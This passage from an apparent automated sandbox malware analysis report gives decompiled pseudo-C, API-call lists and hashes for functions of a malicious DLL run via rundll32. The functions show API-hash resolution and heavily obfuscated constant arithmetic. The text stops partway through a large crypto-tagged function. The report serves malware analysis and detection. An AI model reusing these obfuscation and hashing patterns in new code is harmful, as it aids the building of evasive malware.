                                                                                                                                    control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 259 10001aa0-10001aa2 249->259 260 10001aa4-10001ac9 VirtualAlloc 249->260 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 259->251 262 10001acb-10001acd 260->262 263 10001acf-10001afe call 10001810 260->263 262->251 263->248
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                    • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                    • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                    • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                    • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C7F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 275 2c7f5d-2c7ff1 call 2d20b9 call 2daa30 CreateProcessW
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,002CAD99,?,?,?,181C8C04,002CAD99), ref: 002C7FEB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                    • Instruction ID: 4a01f82819542599de40ac6609f012f20dba998087ce972e44cbeef95de00cfc
                                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                    • Instruction Fuzzy Hash: FD11D372402128BBDF619F91DD09CEF7F79EF193A4F149244FA1921121D2728A60EBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D46BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 280 2d46bb-2d473b call 2d20b9 call 2daa30 SHGetFolderPathW
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E002D46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E002D20B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E002DAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                                    0x002d46d5
                                                                                                                                    0x002d46da
                                                                                                                                    0x002d46e4
                                                                                                                                    0x002d46ec
                                                                                                                                    0x002d46f3
                                                                                                                                    0x002d46f7
                                                                                                                                    0x002d46fe
                                                                                                                                    0x002d4705
                                                                                                                                    0x002d470c
                                                                                                                                    0x002d4724
                                                                                                                                    0x002d4735
                                                                                                                                    0x002d473b

                                                                                                                                    APIs
                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 002D4735
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1514166925-0
                                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                    • Instruction ID: 462efabd92985115be13122997bb23a090fc0cdf6e5c16f12846d6ead5b9ed90
                                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                    • Instruction Fuzzy Hash: 0A01EC75801228BBCF15AFD5DC498DFBFB8EF45394F108145F91866211D2758A60DBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C93ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 285 2c93ed-2c9461 call 2daa30 ExitProcess
                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E002C93ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E002DAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                                    0x002c93f3
                                                                                                                                    0x002c9405
                                                                                                                                    0x002c9411
                                                                                                                                    0x002c9412
                                                                                                                                    0x002c9413
                                                                                                                                    0x002c941a
                                                                                                                                    0x002c9421
                                                                                                                                    0x002c9428
                                                                                                                                    0x002c9433
                                                                                                                                    0x002c9436
                                                                                                                                    0x002c943d
                                                                                                                                    0x002c9444
                                                                                                                                    0x002c9451
                                                                                                                                    0x002c945b

                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNELBASE(00000000), ref: 002C945B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                    • Instruction ID: 275ece5bf1528a1f808f5a3c2440b4fe08de92f4507372b77e3c58ddca27ba69
                                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                    • Instruction Fuzzy Hash: 94F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CB23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 305 2cb23c-2cb2c6 call 2d20b9 call 2daa30 lstrcmpiW
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E002CB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002D20B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E002DAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                                    0x002cb23f
                                                                                                                                    0x002cb240
                                                                                                                                    0x002cb241
                                                                                                                                    0x002cb244
                                                                                                                                    0x002cb247
                                                                                                                                    0x002cb24a
                                                                                                                                    0x002cb24e
                                                                                                                                    0x002cb24f
                                                                                                                                    0x002cb254
                                                                                                                                    0x002cb25e
                                                                                                                                    0x002cb26a
                                                                                                                                    0x002cb271
                                                                                                                                    0x002cb278
                                                                                                                                    0x002cb27f
                                                                                                                                    0x002cb286
                                                                                                                                    0x002cb28d
                                                                                                                                    0x002cb294
                                                                                                                                    0x002cb29b
                                                                                                                                    0x002cb2b3
                                                                                                                                    0x002cb2c1
                                                                                                                                    0x002cb2c6

                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 002CB2C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                    • Instruction ID: b463f9d218cf8d87c31c43e2d114d27e5259489ac6a8a20af7cc9f58206c0dcc
                                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                    • Instruction Fuzzy Hash: 250116B2C04608FFDF45DFD4DD468AEBBB5EB54304F208189B90566262E3728F64AB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 002DE395 Relevance: 24.5, Strings: 19, Instructions: 720COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E002DE395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				signed int _v4;
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _t823;
				void* _t829;
				signed int* _t832;
				signed int _t833;
				signed int _t845;
				signed int _t858;
				signed int _t862;
				intOrPtr _t868;
				signed int _t888;
				void* _t939;
				void* _t948;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t977;
				signed int _t981;
				signed int _t984;
				signed int _t985;
				signed int* _t988;
				void* _t991;

				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_v8 = __edx;
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx & 0x0000ffff);
				E002D20B9(__ecx & 0x0000ffff);
				_v284 = 0x99c43c;
				_t988 =  &(( &_v288)[0xd]);
				_v284 = _v284 + 0xbb14;
				_v284 = _v284 >> 0xb;
				_v284 = _v284 ^ 0x0000134f;
				_t862 = 0;
				_v120 = 0x27310;
				_t977 = 0x329d839;
				_t956 = 0x43;
				_v120 = _v120 / _t956;
				_v120 = _v120 + 0xe2f5;
				_v120 = _v120 ^ 0x0000ec43;
				_v36 = 0x50046c;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x00a00810;
				_v116 = 0x7f268a;
				_v116 = _v116 ^ 0x5f915552;
				_t957 = 0x1b;
				_v276 = 0;
				_v116 = _v116 * 0x3e;
				_v116 = _v116 ^ 0x3bc08e50;
				_v228 = 0xb299e8;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 << 0x10;
				_v228 = _v228 * 0x42;
				_v228 = _v228 ^ 0xb8144000;
				_v64 = 0x620921;
				_v64 = _v64 | 0xbe88b167;
				_v64 = _v64 ^ 0xbeaab967;
				_v172 = 0xae09b0;
				_v172 = _v172 | 0xde677f7d;
				_v172 = _v172 ^ 0xc5d04777;
				_v172 = _v172 ^ 0x1b3b388a;
				_v132 = 0xc06abb;
				_v132 = _v132 ^ 0x2b7b17d1;
				_v132 = _v132 / _t957;
				_v132 = _v132 ^ 0x059ea5d4;
				_v236 = 0x9fdac6;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0x9b65;
				_v236 = _v236 * 0x7b;
				_v236 = _v236 ^ 0x051f8b2b;
				_v108 = 0xc74878;
				_v108 = _v108 + 0x314b;
				_v108 = _v108 * 0x41;
				_v108 = _v108 ^ 0x32a5e883;
				_v196 = 0x1587ec;
				_v196 = _v196 ^ 0x07496474;
				_v196 = _v196 >> 7;
				_t958 = 0x2c;
				_v196 = _v196 / _t958;
				_v196 = _v196 ^ 0x000054ad;
				_v244 = 0xbebf62;
				_v244 = _v244 << 0xb;
				_v244 = _v244 + 0xffffca16;
				_v244 = _v244 << 0xe;
				_v244 = _v244 ^ 0x36858000;
				_v72 = 0x750de5;
				_v72 = _v72 | 0xb336b270;
				_v72 = _v72 ^ 0xb377bff5;
				_v256 = 0xc175fb;
				_t984 = 0x72;
				_t959 = 0x28;
				_v256 = _v256 * 0x26;
				_v256 = _v256 >> 5;
				_v256 = _v256 ^ 0xfb5a89da;
				_v256 = _v256 ^ 0xfbbf3581;
				_v76 = 0x1a7820;
				_v76 = _v76 | 0xb8d3f172;
				_v76 = _v76 ^ 0xb8dbf96d;
				_v224 = 0x97ff87;
				_v224 = _v224 / _t984;
				_v224 = _v224 >> 6;
				_v224 = _v224 * 0x5d;
				_v224 = _v224 ^ 0x0001effe;
				_v40 = 0x7c0450;
				_v40 = _v40 / _t959;
				_v40 = _v40 ^ 0x000319b6;
				_v136 = 0x260fad;
				_v136 = _v136 + 0x622a;
				_t960 = 0x1c;
				_v136 = _v136 / _t960;
				_v136 = _v136 ^ 0x00015e7e;
				_v288 = 0x61f743;
				_t961 = 0x66;
				_v288 = _v288 * 0x25;
				_v288 = _v288 ^ 0x0e2ee817;
				_v288 = 0x858eca;
				_v288 = _v288 / _t984;
				_v288 = _v288 ^ 0x0002de1a;
				_v280 = 0xcba1b8;
				_v280 = _v280 / _t961;
				_v280 = _v280 ^ 0xc2211053;
				_v280 = _v280 + 0xffff75b7;
				_v280 = _v280 ^ 0xc2279606;
				_v288 = 0x614b46;
				_v288 = _v288 >> 4;
				_v288 = _v288 ^ 0x000cf9c3;
				_v288 = 0x794624;
				_v288 = _v288 + 0xb4d0;
				_v288 = _v288 ^ 0x0072cd5b;
				_v288 = 0xcdbe83;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x00034ad6;
				_v288 = 0x24639d;
				_t962 = 0x28;
				_v288 = _v288 / _t962;
				_v288 = _v288 ^ 0x000e4507;
				_v288 = 0x4730ec;
				_t963 = 0x21;
				_v288 = _v288 / _t963;
				_v288 = _v288 ^ 0x0002fb4b;
				_v284 = 0xb301d9;
				_t964 = 0x4e;
				_v284 = _v284 / _t964;
				_v284 = _v284 + 0x8c1d;
				_v284 = _v284 ^ 0x00061f34;
				_v280 = 0xfdcbf7;
				_v280 = _v280 + 0x27a;
				_v280 = _v280 + 0xffff891b;
				_t965 = 0x46;
				_v280 = _v280 / _t965;
				_v280 = _v280 ^ 0x0008575c;
				_v284 = 0xc1d3a0;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 << 2;
				_v284 = _v284 ^ 0x000b0f76;
				_v112 = 0xeee25;
				_v112 = _v112 << 0xc;
				_v112 = _v112 << 4;
				_v112 = _v112 ^ 0xee2c14e7;
				_v180 = 0x8a49b3;
				_v180 = _v180 | 0xb0d6dc69;
				_v180 = _v180 + 0xffffa02a;
				_v180 = _v180 | 0x7fd27f38;
				_v180 = _v180 ^ 0xffd81443;
				_v152 = 0x628374;
				_v152 = _v152 >> 2;
				_v152 = _v152 + 0xffff73d9;
				_t966 = 0x2e;
				_v152 = _v152 / _t966;
				_v152 = _v152 ^ 0x0001ef4a;
				_v28 = 0xe4a1af;
				_v28 = _v28 + 0x32bc;
				_v28 = _v28 ^ 0x00ec33da;
				_v160 = 0x595a50;
				_v160 = _v160 + 0xffffdbfa;
				_v160 = _v160 + 0xffffb344;
				_t967 = 0x36;
				_v160 = _v160 / _t967;
				_v160 = _v160 ^ 0x0006861f;
				_v88 = 0x4d7ad3;
				_v88 = _v88 + 0xc28a;
				_v88 = _v88 ^ 0x004ca34c;
				_v48 = 0xf1782b;
				_v48 = _v48 ^ 0xe8a77c51;
				_v48 = _v48 ^ 0xe85593aa;
				_v100 = 0x42ea8e;
				_t985 = 0x2a;
				_v100 = _v100 / _t985;
				_v100 = _v100 ^ 0x000caa85;
				_v148 = 0xa48e68;
				_t968 = 6;
				_v148 = _v148 / _t968;
				_v148 = _v148 << 0xc;
				_v148 = _v148 ^ 0xb6d58e9e;
				_v252 = 0x4ff2e7;
				_t969 = 0xc;
				_v252 = _v252 / _t969;
				_v252 = _v252 << 6;
				_v252 = _v252 << 0xc;
				_v252 = _v252 ^ 0xa6466867;
				_v80 = 0x4d7637;
				_v80 = _v80 + 0xd199;
				_v80 = _v80 ^ 0x004dfa45;
				_v24 = 0xfee4b3;
				_t970 = 0x3e;
				_v24 = _v24 * 0x23;
				_v24 = _v24 ^ 0x22d37c34;
				_v204 = 0x24209;
				_v204 = _v204 + 0xffffcebc;
				_v204 = _v204 ^ 0x847f2e61;
				_v204 = _v204 + 0xffff5302;
				_v204 = _v204 ^ 0x847f4f7c;
				_v260 = 0x4a587;
				_v260 = _v260 * 0x4a;
				_v260 = _v260 + 0xffff9bf3;
				_v260 = _v260 + 0xffff92e5;
				_v260 = _v260 ^ 0x015b504d;
				_v164 = 0x6d05db;
				_v164 = _v164 * 0x14;
				_v164 = _v164 >> 4;
				_v164 = _v164 ^ 0x556abaa4;
				_v164 = _v164 ^ 0x55e01079;
				_v20 = 0x80cc5b;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000efc86;
				_v104 = 0xc8e6e2;
				_v104 = _v104 << 8;
				_v104 = _v104 >> 0x10;
				_v104 = _v104 ^ 0x000afff3;
				_v272 = 0x560e69;
				_v272 = _v272 + 0x2793;
				_v272 = _v272 * 0xe;
				_v272 = _v272 + 0xc902;
				_v272 = _v272 ^ 0x04bc6edc;
				_v16 = 0xfcaf67;
				_v16 = _v16 / _t970;
				_v16 = _v16 ^ 0x000c0ba9;
				_v56 = 0x81a14f;
				_v56 = _v56 >> 0xb;
				_v56 = _v56 ^ 0x000fb9cd;
				_v32 = 0x24333c;
				_v32 = _v32 / _t985;
				_v32 = _v32 ^ 0x00065bee;
				_v124 = 0xe3a445;
				_v124 = _v124 >> 5;
				_v124 = _v124 >> 7;
				_v124 = _v124 ^ 0x0000dfdf;
				_v220 = 0x5f21d9;
				_t971 = 0x79;
				_v220 = _v220 * 0x54;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0e372a7b;
				_v220 = _v220 ^ 0xe8dc9c41;
				_v188 = 0xc44d01;
				_v188 = _v188 ^ 0x0373dd04;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0xfb03bbf0;
				_v188 = _v188 ^ 0x496460ca;
				_v268 = 0x8213af;
				_v268 = _v268 ^ 0x6d9501b2;
				_v268 = _v268 | 0x4d165578;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x06d55fab;
				_v212 = 0x705526;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 << 9;
				_v212 = _v212 >> 8;
				_v212 = _v212 ^ 0x000b72c4;
				_v92 = 0xc8093b;
				_v92 = _v92 + 0xd043;
				_v92 = _v92 ^ 0x00ca3bde;
				_v264 = 0x1f9619;
				_v264 = _v264 + 0xffffbc34;
				_v264 = _v264 * 0x3e;
				_v264 = _v264 * 0x52;
				_v264 = _v264 ^ 0x6e0edc82;
				_v96 = 0x6d9960;
				_v96 = _v96 | 0x9fb7a8f9;
				_v96 = _v96 ^ 0x9ff35e32;
				_v144 = 0x447df2;
				_v144 = _v144 << 8;
				_v144 = _v144 + 0xffff6cb2;
				_v144 = _v144 ^ 0x44714589;
				_v240 = 0x65db08;
				_v240 = _v240 * 6;
				_v240 = _v240 + 0x5f97;
				_v240 = _v240 >> 0xd;
				_v240 = _v240 ^ 0x000293b4;
				_v84 = 0x3c7c20;
				_v84 = _v84 ^ 0x2c3d49c2;
				_v84 = _v84 ^ 0x2c080053;
				_v248 = 0x13c85;
				_v248 = _v248 + 0x8cd8;
				_v248 = _v248 + 0x6e3d;
				_v248 = _v248 ^ 0xe59eace5;
				_v248 = _v248 ^ 0xe5984999;
				_v216 = 0x6164ef;
				_v216 = _v216 << 6;
				_v216 = _v216 + 0xffff2edc;
				_v216 = _v216 | 0xa66c888f;
				_v216 = _v216 ^ 0xbe7947d5;
				_v232 = 0x991e82;
				_v232 = _v232 + 0xffff48fb;
				_v232 = _v232 >> 0xe;
				_v232 = _v232 | 0x69e4ac2c;
				_v232 = _v232 ^ 0x69ef7d1b;
				_v68 = 0x9d94b2;
				_v68 = _v68 | 0xcead792c;
				_v68 = _v68 ^ 0xceb9e800;
				_v44 = 0x20071e;
				_v44 = _v44 / _t971;
				_v44 = _v44 ^ 0x000a654c;
				_v128 = 0x223cb7;
				_v128 = _v128 + 0x9bf0;
				_v128 = _v128 | 0x79b7d361;
				_v128 = _v128 ^ 0x79b3b147;
				_v52 = 0x8ed203;
				_v52 = _v52 + 0xffff1a7b;
				_v52 = _v52 ^ 0x008be8c4;
				_v208 = 0xe0ac17;
				_v208 = _v208 ^ 0xbcfe8cf2;
				_t972 = 0x6b;
				_v208 = _v208 / _t972;
				_v208 = _v208 | 0x3ee9ec5f;
				_v208 = _v208 ^ 0x3fec9c1d;
				_v192 = 0x219bfa;
				_v192 = _v192 >> 4;
				_v192 = _v192 + 0x77e4;
				_v192 = _v192 | 0x2fb4141c;
				_v192 = _v192 ^ 0x2fb2076e;
				_v200 = 0x8926e2;
				_v200 = _v200 << 4;
				_t973 = 0xc;
				_v200 = _v200 / _t973;
				_v200 = _v200 + 0xffff5704;
				_v200 = _v200 ^ 0x00bbfbcc;
				_v284 = 0xaed0cb;
				_v284 = _v284 + 0x9c17;
				_v284 = _v284 + 0xaf6d;
				_v284 = _v284 ^ 0x00b89bc1;
				_v168 = 0x914ce9;
				_v168 = _v168 | 0xceb3d4af;
				_v168 = _v168 ^ 0x5adaba1c;
				_v168 = _v168 ^ 0x3c292fbf;
				_v168 = _v168 ^ 0xa84ea968;
				_v156 = 0x90c891;
				_v156 = _v156 + 0xffff3667;
				_t974 = 0x5c;
				_v156 = _v156 / _t974;
				_t975 = 0x3c;
				_v156 = _v156 / _t975;
				_v156 = _v156 ^ 0x000da682;
				_v140 = 0xffcb83;
				_v140 = _v140 << 0xd;
				_v140 = _v140 | 0xcebab625;
				_v140 = _v140 ^ 0xfff71570;
				_v280 = 0xfef1ee;
				_v280 = _v280 >> 8;
				_v280 = _v280 + 0xffff306e;
				_v280 = _v280 | 0x3331510b;
				_v280 = _v280 ^ 0x3338227a;
				_v176 = 0xc7331d;
				_v176 = _v176 >> 7;
				_v176 = _v176 + 0x1d50;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x00370898;
				_v288 = 0x519041;
				_v288 = _v288 + 0x7cd9;
				_v288 = _v288 ^ 0x0057f5a9;
				_t976 = _v12;
				_t986 = _v12;
				while(1) {
					L1:
					_t939 = 0x68a9e90;
					while(1) {
						_t823 = _v184;
						while(1) {
							L3:
							_t991 = _t977 - _t939;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								__eflags =  *_v8;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v20);
									_t868 = E002DDCF7(_v164, 0x2c1524, __eflags);
									_v276 = _t868;
								}
								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
								_t981 = _a44 & 1;
								__eflags = _t981;
								if(_t981 != 0) {
									__eflags = _t845;
								}
								_push(_t868);
